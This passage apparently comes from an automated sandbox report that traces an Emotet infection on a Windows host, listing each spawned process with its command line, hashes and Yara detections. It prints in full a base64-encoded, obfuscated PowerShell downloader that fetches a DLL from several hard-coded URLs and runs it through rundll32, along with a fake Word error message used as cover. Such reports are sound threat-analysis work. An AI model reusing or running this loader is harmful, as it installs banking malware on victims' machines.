AKwAoACgAJwApACgAJwArACcAQABoAHQAdAAnACkAKQArACgAKAAnAHAAJwArACcAOgBKACkAJwApACkAKwAnACgAJwArACgAKAAnADMAcwAnACsAJwAyACkAKABKACcAKwAnACkAKAAzAHMAJwApACkAKwAoACgAJwAyACkAKABwAGEAJwArACcAdQBsACcAKwAnAHMAJwApACkAKwAoACcAYwBvACcAKwAnAG0AcAAnACkAKwAoACcAdQB0AGkAJwArACcAbgAnACkAKwAoACcAZwAuAGMAJwArACcAbwAnACkAKwAoACgAJwBtACcAKwAnAEoAKQAoADMAcwAyACkAKAAnACkAKQArACgAJwBDACcAKwAnAHIAYQBpACcAKQArACgAJwBnACcAKwAnAHMATQAnACkAKwAnAGEAZwAnACsAKAAnAGkAYwBTAHEAJwArACcAdQBhAHIAZQAnACkAKwAoACgAJwBKACkAJwArACcAKAAzAHMAMgApACgASAAnACsAJwBKACcAKwAnACkAKAAnACkAKQArACgAKAAnADMAJwArACcAcwAyACkAKAAnACkAKQArACcAQAAnACsAJwBoAHQAJwArACgAJwB0ACcAKwAnAHAAcwAnACkAKwAnADoAJwArACgAKAAnAEoAKQAnACsAJwAoACcAKQApACsAKAAnADMAJwArACcAcwAyACcAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAcwAyACcAKwAnACkAKAAnACsAJwBnAG8AJwArACcAbABkAGkAbABvAGMAawAnACkAKQArACgAJwBzACcAKwAnAHQAcgAnACkAKwAoACcAYQAnACsAJwBpAG4AaQAnACkAKwAoACgAJwBuAGcAJwArACcALgAnACsAJwBjAG8AbQBKACkAKAAnACsAJwAzACcAKQApACsAKAAoACcAcwAyACkAJwArACcAKAAnACkAKQArACgAJwB3AHAAJwArACcALQAnACkAKwAoACcAaQAnACsAJwBuAGMAJwApACsAKAAnAGwAJwArACcAdQBkACcAKQArACgAJwBlAHMAJwArACcASgAnACkAKwAnACkAJwArACcAKAAnACsAKAAoACcAMwBzADIAKQAnACsAJwAoACcAKwAnAGIAZgB0AHQAJwApACkAKwAoACgAJwBKACkAKAAnACsAJwAzAHMAJwApACkAKwAnADIAJwArACgAKAAnACkAKAAnACsAJwBAAGgAdAAnACkAKQArACgAKAAnAHQAcABzADoAJwArACcASgApACcAKQApACsAKAAoACcAKAAzAHMAJwArACcAMgApACgASgAnACsAJwApACgAMwBzACcAKQApACsAKAAoACcAMgApACgAagAnACsAJwBlAGYAZgBkACcAKwAnAGEAaABsACcAKQApACsAKAAoACcAawBlAC4AJwArACcAYwBvAG0AJwArACcASgAnACsAJwApACgAMwBzADIAKQAoACcAKQApACsAKAAoACcAYwBzAHMASgAnACsAJwApACcAKQApACsAKAAnACgAMwBzADIAJwArACcAKQAnACkAKwAoACgAJwAoAGIAZwA0AG4AMwAnACsAJwBKACkAKAAnACkAKQArACcAMwAnACsAKAAoACcAcwAyACkAJwArACcAKABAAGgAdAAnACsAJwB0AHAAJwArACcAOgBKACkAKAAnACsAJwAzACcAKwAnAHMAJwArACcAMgApACgASgApACgAJwArACcAMwBzADIAKQAoACcAKQApACsAKAAnAGEAegAnACsAJwByAGEAJwArACcAawB0AG8AJwApACsAJwB1ACcAKwAoACcAcgBzACcAKwAnAC4AYwBvACcAKwAnAG0AJwApACsAKAAoACcASgAnACsAJwApACgAJwApACkAKwAoACgAJwAzAHMAJwArACcAMgApACgAJwApACkAKwAoACcAdwAnACsAJwBwAC0AYwAnACsAJwBvAG4AdABlACcAKQArACcAbgAnACsAJwB0AEoAJwArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAKAAnACsAJwBOAFcARgAnACkAKQArACgAKAAnADkAagAnACsAJwBDAEoAKQAnACkAKQArACgAKAAnACgAJwArACcAMwBzADIAKQAoACcAKwAnAEAAJwArACcAaAB0AHQAcAAnACkAKQArACgAKAAnADoASgApACcAKwAnACgAMwAnACsAJwBzADIAJwApACkAKwAoACgAJwApACgASgAnACsAJwApACgAMwAnACkAKQArACcAcwAyACcAKwAoACgAJwApACgAJwApACkAKwAoACcAZwBvAGwAZABjAG8AJwArACcAYQBzACcAKQArACgAJwB0AG8AZgAnACsAJwBmACcAKQArACgAJwBpAGMAJwArACcAZQAzADYANQAnACsAJwAuAGMAbwAnACkAKwAoACgAJwBtAEoAJwArACcAKQAoACcAKQApACsAJwAzAHMAJwArACgAKAAnADIAKQAoAHQAZQBtAHAAJwArACcASgApACgAMwAnACsAJwBzADIAKQAoAFgASgApACcAKwAnACgAMwBzACcAKQApACsAKAAoACcAMgAnACsAJwApACgAJwApACkAKQApAC4AIgBSAGUAYABwAGAAbABhAGMARQAiACgAKAAoACcASgAnACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoACcAKQApACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcALwAnACkALAAoACcAaAB3ACcAKwAnAGUAJwApACkAWwAwAF0AKQAuACIAcwBgAHAAbABJAHQAIgAoACQAQwBkADkAcwB4ADMAYwAgACsAIAAkAEMANgA3AHkAdgBwAF8AIAArACAAJABRAGgAaABoADcAZQBpACkAOwAkAEQAYQA4AHMAaQA0ADAAPQAoACcATQAzACcAKwAoACcAeQB3AG4ANwAnACsAJwByACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABLADQAYwBlAGoAawBqACAAaQBuACAAJABDAGsAOAAxAHgAeAAyACAAfAAgAFMAbwByAFQAYAAtAG8AYgBqAGUAYABjAFQAIAB7AEcARQBUAGAALQBgAFIAYABBAE4AZABvAE0AfQApAHsAdAByAHkAewAkAE4AbQA5AGQAYwB0AG4ALgAiAEQAbwBXAGAATgBMAGAAbwBBAGQAZgBgAGkAbABlACIAKAAkAEsANABjAGUAagBrAGoALAAgACQAUABpADkAbgB5AGYAcQApADsAJABJAGYAagBpAF8AcwA1AD0AKAAnAFQAMgAnACsAJwAwACcAKwAoACcAYwAyAHoAJwArACcAZQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdAAnACsAJwBlAG0AJwApACAAJABQAGkAOQBuAHkAZgBxACkALgAiAGwARQBgAE4ARwBUAGgAIgAgAC0AZwBlACAAMwA1ADUANgA5ACkAIAB7AC4AKAAnAHIAdQAnACsAJwBuAGQAJwArACcAbABsADMAMgAnACkAIAAkAFAAaQA5AG4AeQBmAHEALAAnACMAMQAnAC4AIgBUAE8AUwBgAFQAUgBgAEkATgBnACIAKAApADsAJABKAGIAZgBhAGYAdwBsAD0AKAAnAEUAYQAnACsAJwA3AGQAJwArACgAJwByAG4AJwArACcAMwAnACkAKQA7AGIAcgBlAGEAawA7ACQASgA4ADIANwBhADYAdwA9ACgAJwBVACcAKwAoACcAMgBzADYAOABiACcAKwAnADQAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAMwBhADUAbAA1AGcAPQAoACgAJwBZACcAKwAnAGQANQBzADkAJwApACsAJwBhAGsAJwApAA==
Imagebase:	0x4a510000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: msg.exe PID: 2504 Parent PID: 592

General

Start time:	18:10:38
Start date:	08/01/2021
Path:	C:\Windows\System32\msg.exe
Wow64 process (32bit):	false
Commandline:	msg user /v Word experienced an error trying to open the file.
Imagebase:	0xff120000
File size:	26112 bytes
MD5 hash:	2214979661E779C3E3C33D4F14E6F3AC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 2408 Parent PID: 592

General

Start time:	18:10:39
Start date:	08/01/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAcgAnACkAKQArACgAKAAnAFIAJwArACcAdwBSAHoAJwArACcAYwBKACkAKAAzAHMAMgApACgAQAAnACsAJwBoAHQAJwArACcAdAAnACkAKQArACgAKAAnAHAAOgBKACcAKwAnACkAKAAnACkAKQArACcAMwBzACcAKwAnADIAJwArACgAKAAnACkAKABKACkAJwArACcAKAAnACkAKQArACgAJwAzAHMAJwArACcAMgAnACkAKwAoACgAJwApACgAagBvACcAKwAnAHMAZQBnACcAKwAnAGUAJwArACcAbgBlAC4AYwAnACkAKQArACgAJwBvACcAKwAnAG0ASgAnACkAKwAoACgAJwApACgAMwBzACcAKwAnADIAKQAoAHQAJwArACcAaAAnACkAKQArACcAZQBtACcAKwAoACgAJwBlAEoAKQAoADMAJwArACcAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoACcAKwAnAGcAVQA4AEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcAQABoAHQAdAAnACkAKQArACgAKAAnAHAAJwArACcAOgBKACkAJwApACkAKwAnACgAJwArACgAKAAnADMAcwAnACsAJwAyACkAKABKACcAKwAnACkAKAAzAHMAJwApACkAKwAoACgAJwAyACkAKABwAGEAJwArACcAdQBsACcAKwAnAHMAJwApACkAKwAoACcAYwBvACcAKwAnAG0AcAAnACkAKwAoACcAdQB0AGkAJwArACcAbgAnACkAKwAoACcAZwAuAGMAJwArACcAbwAnACkAKwAoACgAJwBtACcAKwAnAEoAKQAoADMAcwAyACkAKAAnACkAKQArACgAJwBDACcAKwAnAHIAYQBpACcAKQArACgAJwBnACcAKwAnAHMATQAnACkAKwAnAGEAZwAnACsAKAAnAGkAYwBTAHEAJwArACcAdQBhAHIAZQAnACkAKwAoACgAJwBKACkAJwArACcAKAAzAHMAMgApACgASAAnACsAJwBKACcAKwAnACkAKAAnACkAKQArACgAKAAnADMAJwArACcAcwAyACkAKAAnACkAKQArACcAQAAnACsAJwBoAHQAJwArACgAJwB0ACcAKwAnAHAAcwAnACkAKwAnADoAJwArACgAKAAnAEoAKQAnACsAJwAoACcAKQApACsAKAAnADMAJwArACcAcwAyACcAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAcwAyACcAKwAnACkAKAAnACsAJwBnAG8AJwArACcAbABkAGkAbABvAGMAawAnACkAKQArACgAJwBzACcAKwAnAHQAcgAnACkAKwAoACcAYQAnACsAJwBpAG4AaQAnACkAKwAoACgAJwBuAGcAJwArACcALgAnACsAJwBjAG8AbQBKACkAKAAnACsAJwAzACcAKQApACsAKAAoACcAcwAyACkAJwArACcAKAAnACkAKQArACgAJwB3AHAAJwArACcALQAnACkAKwAoACcAaQAnACsAJwBuAGMAJwApACsAKAAnAGwAJwArACcAdQBkACcAKQArACgAJwBlAHMAJwArACcASgAnACkAKwAnACkAJwArACcAKAAnACsAKAAoACcAMwBzADIAKQAnACsAJwAoACcAKwAnAGIAZgB0AHQAJwApACkAKwAoACgAJwBKACkAKAAnACsAJwAzAHMAJwApACkAKwAnADIAJwArACgAKAAnACkAKAAnACsAJwBAAGgAdAAnACkAKQArACgAKAAnAHQAcABzADoAJwArACcASgApACcAKQApACsAKAAoACcAKAAzAHMAJwArACcAMgApACgASgAnACsAJwApACgAMwBzACcAKQApACsAKAAoACcAMgApACgAagAnACsAJwBlAGYAZgBkACcAKwAnAGEAaABsACcAKQApACsAKAAoACcAawBlAC4AJwArACcAYwBvAG0AJwArACcASgAnACsAJwApACgAMwBzADIAKQAoACcAKQApACsAKAAoACcAYwBzAHMASgAnACsAJwApACcAKQApACsAKAAnACgAMwBzADIAJwArACcAKQAnACkAKwAoACgAJwAoAGIAZwA0AG4AMwAnACsAJwBKACkAKAAnACkAKQArACcAMwAnACsAKAAoACcAcwAyACkAJwArACcAKABAAGgAdAAnACsAJwB0AHAAJwArACcAOgBKACkAKAAnACsAJwAzACcAKwAnAHMAJwArACcAMgApACgASgApACgAJwArACcAMwBzADIAKQAoACcAKQApACsAKAAnAGEAegAnACsAJwByAGEAJwArACcAawB0AG8AJwApACsAJwB1ACcAKwAoACcAcgBzACcAKwAnAC4AYwBvACcAKwAnAG0AJwApACsAKAAoACcASgAnACsAJwApACgAJwApACkAKwAoACgAJwAzAHMAJwArACcAMgApACgAJwApACkAKwAoACcAdwAnACsAJwBwAC0AYwAnACsAJwBvAG4AdABlACcAKQArACcAbgAnACsAJwB0AEoAJwArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAKAAnACsAJwBOAFcARgAnACkAKQArACgAKAAnADkAagAnACsAJwBDAEoAKQAnACkAKQArACgAKAAnACgAJwArACcAMwBzADIAKQAoACcAKwAnAEAAJwArACcAaAB0AHQAcAAnACkAKQArACgAKAAnADoASgApACcAKwAnACgAMwAnACsAJwBzADIAJwApACkAKwAoACgAJwApACgASgAnACsAJwApACgAMwAnACkAKQArACcAcwAyACcAKwAoACgAJwApACgAJwApACkAKwAoACcAZwBvAGwAZABjAG8AJwArACcAYQBzACcAKQArACgAJwB0AG8AZgAnACsAJwBmACcAKQArACgAJwBpAGMAJwArACcAZQAzADYANQAnACsAJwAuAGMAbwAnACkAKwAoACgAJwBtAEoAJwArACcAKQAoACcAKQApACsAJwAzAHMAJwArACgAKAAnADIAKQAoAHQAZQBtAHAAJwArACcASgApACgAMwAnACsAJwBzADIAKQAoAFgASgApACcAKwAnACgAMwBzACcAKQApACsAKAAoACcAMgAnACsAJwApACgAJwApACkAKQApAC4AIgBSAGUAYABwAGAAbABhAGMARQAiACgAKAAoACcASgAnACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoACcAKQApACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcALwAnACkALAAoACcAaAB3ACcAKwAnAGUAJwApACkAWwAwAF0AKQAuACIAcwBgAHAAbABJAHQAIgAoACQAQwBkADkAcwB4ADMAYwAgACsAIAAkAEMANgA3AHkAdgBwAF8AIAArACAAJABRAGgAaABoADcAZQBpACkAOwAkAEQAYQA4AHMAaQA0ADAAPQAoACcATQAzACcAKwAoACcAeQB3AG4ANwAnACsAJwByACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABLADQAYwBlAGoAawBqACAAaQBuACAAJABDAGsAOAAxAHgAeAAyACAAfAAgAFMAbwByAFQAYAAtAG8AYgBqAGUAYABjAFQAIAB7AEcARQBUAGAALQBgAFIAYABBAE4AZABvAE0AfQApAHsAdAByAHkAewAkAE4AbQA5AGQAYwB0AG4ALgAiAEQAbwBXAGAATgBMAGAAbwBBAGQAZgBgAGkAbABlACIAKAAkAEsANABjAGUAagBrAGoALAAgACQAUABpADkAbgB5AGYAcQApADsAJABJAGYAagBpAF8AcwA1AD0AKAAnAFQAMgAnACsAJwAwACcAKwAoACcAYwAyAHoAJwArACcAZQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdAAnACsAJwBlAG0AJwApACAAJABQAGkAOQBuAHkAZgBxACkALgAiAGwARQBgAE4ARwBUAGgAIgAgAC0AZwBlACAAMwA1ADUANgA5ACkAIAB7AC4AKAAnAHIAdQAnACsAJwBuAGQAJwArACcAbABsADMAMgAnACkAIAAkAFAAaQA5AG4AeQBmAHEALAAnACMAMQAnAC4AIgBUAE8AUwBgAFQAUgBgAEkATgBnACIAKAApADsAJABKAGIAZgBhAGYAdwBsAD0AKAAnAEUAYQAnACsAJwA3AGQAJwArACgAJwByAG4AJwArACcAMwAnACkAKQA7AGIAcgBlAGEAawA7ACQASgA4ADIANwBhADYAdwA9ACgAJwBVACcAKwAoACcAMgBzADYAOABiACcAKwAnADQAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAMwBhADUAbAA1AGcAPQAoACgAJwBZACcAKwAnAGQANQBzADkAJwApACsAJwBhAGsAJwApAA==
Imagebase:	0x13fa10000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2093207161.0000000001CB4000.00000004.00000040.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2093170388.00000000002B6000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2532 Parent PID: 2408

General

Start time:	18:10:43
Start date:	08/01/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
Imagebase:	0xff710000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2340 Parent PID: 2532

General

Start time:	18:10:43
Start date:	08/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
Imagebase:	0x950000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2094781101.0000000000220000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2336 Parent PID: 2340

General

Start time:	18:10:44
Start date:	08/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lkvi\ejqhpm.twa',RunDLL
Imagebase:	0x950000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2096911565.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2096946723.00000000001C1000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2816 Parent PID: 2336

General

Start time:	18:10:45
Start date:	08/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yffe\xmxs.xtt',RunDLL
Imagebase:	0x950000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2097726962.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2097776820.00000000001C1000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2760 Parent PID: 2816

General

Start time:	18:10:45
Start date:	08/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yxkq\vxcyp.vst',RunDLL
Imagebase:	0x950000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2098974182.0000000000180000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2099046063.0000000000201000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2824 Parent PID: 2760

General

Start time:	18:10:46
Start date:	08/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Glql\mritqo.dtl',RunDLL
Imagebase:	0x950000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2101214081.00000000006B1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2101161516.0000000000690000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2460 Parent PID: 2824

General

Start time:	18:10:47
Start date:	08/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xlll\midsk.ptl',RunDLL
Imagebase:	0x950000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2102146226.0000000000270000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2102416514.0000000000711000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 1492 Parent PID: 2460

General

Start time:	18:10:47
Start date:	08/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qpvq\ojxkj.pqe',RunDLL
Imagebase:	0x950000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2103138481.00000000001F1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2102968277.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2800 Parent PID: 1492

General

Start time:	18:10:48
Start date:	08/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qfbx\wpmmbwy.jek',RunDLL
Imagebase:	0x950000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2104372498.0000000000211000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2104274004.0000000000150000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 3032 Parent PID: 2800

General

Start time:	18:10:48
Start date:	08/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ljbn\kwuw.ehe',RunDLL
Imagebase:	0x950000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
